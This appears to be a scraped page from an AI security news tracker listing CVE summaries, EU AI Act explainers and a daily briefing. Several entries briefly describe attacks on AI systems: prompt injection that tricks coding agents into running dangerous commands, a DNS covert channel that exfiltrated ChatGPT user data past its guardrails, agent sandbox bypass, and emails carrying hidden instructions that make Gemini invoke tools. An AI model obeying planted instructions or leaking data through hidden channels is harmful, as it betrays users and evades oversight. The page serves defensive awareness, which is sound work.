aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDataset
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

[TOTAL_TRACKED]
2,677
[LAST_24H]
23
[LAST_7D]
166
Daily BriefingMonday, March 30, 2026
>

Anthropic's Unreleased Cybersecurity Model Accidentally Exposed: A configuration error leaked details of Anthropic's powerful new AI model called Mythos, designed for cybersecurity use cases with advanced reasoning and coding abilities including recursive self-fixing (autonomously finding and patching its own bugs). The leak raises concerns because the model's improved vulnerability detection could enable more sophisticated cyberattacks, prompting Anthropic to plan a phased rollout to enterprise security teams first.

>

Critical Command Injection in MLflow Model Deployment: MLflow has a command injection vulnerability (where attackers insert malicious commands into input that gets executed) in its model serving code when using `env_manager=LOCAL`, allowing attackers to execute arbitrary commands by manipulating dependency information in the `python_env.yaml` file without any safety checks. (CVE-2025-15379, Critical)

Latest Intel

page 206/268
VIEW ALL
01

CVE-2024-2057: A vulnerability was found in LangChain langchain_community 0.0.26. It has been classified as critical. Affected is the f

security
Mar 1, 2024

A critical vulnerability was found in LangChain's langchain_community library version 0.0.26 in the TFIDFRetriever component (a tool that retrieves relevant documents for AI systems). The flaw allows server-side request forgery (SSRF, where an attacker tricks a server into making unwanted network requests on their behalf), and it can be exploited remotely.

Critical This Week5 issues
critical

CVE-2025-15379: A command injection vulnerability exists in MLflow's model serving container initialization code, specifically in the `_

CVE-2025-15379NVD/CVE DatabaseMar 30, 2026
Mar 30, 2026
>

Multiple High-Severity Flaws in AI Agent Frameworks: CrewAI has several vulnerabilities including Docker fallback issues that enable RCE (remote code execution, where attackers run commands on systems they don't control) when containerization fails (CVE-2026-2287, CVE-2026-2275), while OpenClaw suffers from malicious plugin code execution during installation and sandbox bypass flaws that let agents access other agents' workspaces. SakaDev and HAI Build Code Generator can both be tricked through prompt injection (hiding malicious instructions in normal-looking input) to misclassify dangerous terminal commands as safe and execute them automatically (CVE-2026-30306, CVE-2026-30308).

>

ChatGPT Data Leakage Vulnerability Patched: OpenAI fixed a vulnerability that allowed attackers to secretly extract sensitive user data including conversation messages and uploaded files by exploiting a hidden DNS-based communication channel (covert data transmission using the Domain Name System) in ChatGPT's Linux runtime, bypassing all safety guardrails designed to prevent unauthorized data sharing.

Fix: Upgrading to version 0.0.27 addresses this issue.

NVD/CVE Database
02

AI Act Implementation: Timelines & Next steps

policy
Feb 28, 2024

The EU AI Act is a regulatory framework that requires companies to comply with rules for different types of AI systems on specific timelines, starting with prohibitions on the riskiest AI uses within 6 months and expanding to cover high-risk AI systems (such as those used in law enforcement, hiring, or education) by 24 months after the law takes effect. The article outlines key compliance deadlines, secondary laws the EU Commission might create to clarify the rules, and guidance documents to help organizations understand how to follow the AI Act.

EU AI Act Updates
03

CVE-2024-25723: ZenML Server in the ZenML machine learning package before 0.46.7 for Python allows remote privilege escalation because t

security
Feb 27, 2024

ZenML Server in the ZenML machine learning package before version 0.46.7 has a remote privilege escalation vulnerability (CVE-2024-25723), meaning an attacker can gain higher-level access to the system from a distance. The flaw exists in a REST API endpoint (a web-based interface for requests) that activates user accounts, because it only requires a valid username and new password to change account settings, without proper access controls checking who should be allowed to do this.

Fix: Update ZenML to version 0.46.7 or use one of the patched versions: 0.44.4, 0.43.1, or 0.42.2.

NVD/CVE Database
04

High-level summary of the AI Act

policy
Feb 27, 2024

The EU AI Act classifies AI systems by risk level, from prohibited (like social scoring systems that manipulate behavior) to minimal risk (unregulated). High-risk AI systems, such as those used in critical decisions affecting people's lives, face strict regulations requiring developers to provide documentation, conduct testing, and monitor for problems. General-purpose AI (large language models that can do many tasks) have lighter requirements unless they present systemic risk, in which case developers must test them against adversarial attacks (attempts to trick or break them) and report serious incidents.

EU AI Act Updates
05

CVE-2024-27444: langchain_experimental (aka LangChain Experimental) in LangChain before 0.1.8 allows an attacker to bypass the CVE-2023-

security
Feb 26, 2024

CVE-2024-27444 is a vulnerability in LangChain Experimental (a Python library for building AI applications) before version 0.1.8 that allows attackers to bypass a previous security fix and run arbitrary code (malicious commands they choose) by using Python's special attributes like __import__ and __globals__, which were not blocked by the pal_chain/base.py security checks.

Fix: Update to LangChain version 0.1.8 or later. A patch is available at https://github.com/langchain-ai/langchain/commit/de9a6cdf163ed00adaf2e559203ed0a9ca2f1de7.

NVD/CVE Database
06

CVE-2024-27133: Insufficient sanitization in MLflow leads to XSS when running a recipe that uses an untrusted dataset. This issue leads

security
Feb 23, 2024

MLflow, a machine learning platform, has a vulnerability where it doesn't properly clean user input from dataset tables, allowing XSS (cross-site scripting, where attackers inject malicious code into web pages). When someone runs a recipe using an untrusted dataset in Jupyter Notebook, this can lead to RCE (remote code execution, where an attacker can run commands on the user's computer).

Fix: A patch is available at https://github.com/mlflow/mlflow/pull/10893

NVD/CVE Database
07

CVE-2024-27132: Insufficient sanitization in MLflow leads to XSS when running an untrusted recipe. This issue leads to a client-side RC

security
Feb 23, 2024

MLflow has a vulnerability (CVE-2024-27132) where template variables are not properly sanitized, allowing XSS (cross-site scripting, where malicious code runs in a user's browser) when running an untrusted recipe in Jupyter Notebook. This can lead to client-side RCE (remote code execution, where an attacker can run commands on the user's computer) through insufficient input cleaning.

NVD/CVE Database
08

CVE-2024-27319: Versions of the package onnx before and including 1.15.0 are vulnerable to Out-of-bounds Read as the ONNX_ASSERT and ONN

security
Feb 23, 2024

ONNX (a machine learning model format library) versions 1.15.0 and earlier have an out-of-bounds read vulnerability (accessing memory outside intended boundaries) caused by an off-by-one error in the ONNX_ASSERT and ONNX_ASSERTM functions, which handle string copying. This flaw could allow attackers to read sensitive data from memory.

NVD/CVE Database
09

CVE-2024-27318: Versions of the package onnx before and including 1.15.0 are vulnerable to Directory Traversal as the external_data fiel

security
Feb 23, 2024

ONNX (a machine learning model format) versions 1.15.0 and earlier contain a directory traversal vulnerability (a security flaw where an attacker can access files outside the intended directory) in the external_data field of tensor proto (a data structure component). This vulnerability bypasses a previous security patch, allowing attackers to potentially access files they shouldn't be able to reach.

NVD/CVE Database
10

Google Gemini: Planting Instructions For Delayed Automatic Tool Invocation

securitysafety
Feb 23, 2024

A researcher discovered a vulnerability in Google Gemini where attackers can hide instructions in emails that trick the AI into automatically calling external tools (called Extensions) without the user's knowledge. When a user asks the AI to analyze a malicious email, the AI follows the hidden instructions and invokes the tool, which is a form of request forgery (making unauthorized requests on behalf of the user).

Embrace The Red
Prev1...204205206207208...268Next
critical

CVE-2026-33873: Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assis

CVE-2026-33873NVD/CVE DatabaseMar 27, 2026
Mar 27, 2026
critical

Attackers exploit critical Langflow RCE within hours as CISA sounds alarm

CSO OnlineMar 27, 2026
Mar 27, 2026
critical

CVE-2025-53521: F5 BIG-IP Unspecified Vulnerability

CVE-2025-53521CISA Known Exploited VulnerabilitiesMar 26, 2026
Mar 26, 2026
critical

CISA: New Langflow flaw actively exploited to hijack AI workflows

BleepingComputerMar 26, 2026
Mar 26, 2026